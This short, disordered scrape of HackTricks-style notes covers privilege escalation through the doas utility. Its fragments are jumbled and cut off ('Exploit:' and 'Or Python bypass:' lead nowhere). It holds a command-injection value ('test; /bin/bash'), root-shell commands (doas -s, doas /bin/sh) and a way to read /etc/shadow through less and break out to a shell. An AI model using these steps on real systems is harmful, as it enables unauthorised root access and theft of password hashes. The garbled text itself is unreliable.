Hacktricks — Doas

#!/bin/sh doas /usr/bin/chown user "$1" Exploit:

— HackTricks Want more? Check out the HackTricks Linux Privilege Escalation guide for deeper dives. hacktricks doas

./script.sh "test; /bin/bash" permit persist user1 as root Once you run doas -n id with password once, subsequent commands don’t need a password for a few minutes. hacktricks doas

doas -s # or doas /bin/sh If the config allows a wildcard path, you might inject arguments. hacktricks doas

doas /usr/bin/less /etc/shadow # inside less: !/bin/sh Or Python bypass: